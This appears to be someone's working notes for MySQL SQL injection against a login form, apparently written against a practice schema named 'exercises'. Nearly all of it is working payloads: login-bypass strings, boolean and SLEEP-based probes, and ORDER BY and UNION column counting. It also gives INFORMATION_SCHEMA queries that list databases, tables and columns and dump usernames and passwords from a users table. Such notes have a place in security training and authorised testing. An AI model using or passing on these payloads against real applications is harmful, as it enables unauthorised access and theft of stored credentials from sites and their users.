Working notes
%20 = space
%27 = '
-- adfdsfdsf is a comment (MySQL needs whitespace after the two dashes; the trailing junk only pads the line)
%23 = # (the other MySQL line comment)
@@version (server version)
@@hostname (server host name)
user() (account the application connects as)
database() (schema currently in use)
Check Vulnerability
Admin' or ''='
Admin' or 'a'='a'-- asd
Admin' or 'a'='a
admin' -- lk
admin' AND 1696=1696 AND 'LeED'='LeED (true condition: response should match the original)
admin' AND SLEEP(5) AND 'BOnx'='BOnx (time based: response should be delayed about 5 seconds)
admin' ORDER BY 1-- lpmY
admin' ORDER BY 100-- lpmY (should error if ORDER BY 1 did not)
password('a') != password('A')
root'/**/or/**/'1'='1 (inline comments stand in for spaces when spaces are filtered)
Get number of Columns
- Order By Based
- admin%27%20order%20by%203--%20l (admin' order by 3-- l)
- Keep increasing the number until you hit an error.
- ORDER BY n only works while n is at most the number of selected columns, so if 5 works and 6 errors, the query has 5 columns.
- Union Based
- admin' union select null, null,.......,null-- lk
- Start with one null and add one at a time; a wrong count gives an error. If 3 nulls return the original (true) response, the query has 3 columns. NULL is used because it matches any column type.
- admin%27%20union%20select%20database(),user(),@@version,null,null--%20j (admin' union select database(),user(),@@version,null,null-- j): replacing nulls with values shows which columns are rendered in the page and fingerprints the target in the same request.
Get list of databases
- admin' UNION SELECT NULL,NULL,schema_name,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- RPYg
Get list of tables in a particular DB
- admin' UNION ALL SELECT NULL,NULL,table_name ,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='information_schema'-- SlTg (swap 'information_schema' for a schema name from the previous step, e.g. 'exercises')
Get Column names in a table
- admin' UNION ALL SELECT NULL,COLUMN_TYPE,COLUMN_NAME,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='exercises' AND TABLE_NAME='users'-- RPYg
- admin' UNION ALL SELECT NULL,NULL,COLUMN_NAME,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='exercises' AND TABLE_NAME='users'-- RPYg
Get data from table (after column names)
- admin' UNION ALL SELECT NULL,NULL,CONCAT(';;',age,';;',groupid,';;',id,';;',name,';;',passwd,';;'),NULL,NULL FROM exercises.users-- BxLe
- age, groupid, id, name and passwd are the column names retrieved in the previous step; the ';;' separators keep the fields apart in the rendered output, and the non-existent-user trick (a username that matches nothing) leaves only the UNIONed rows in the response.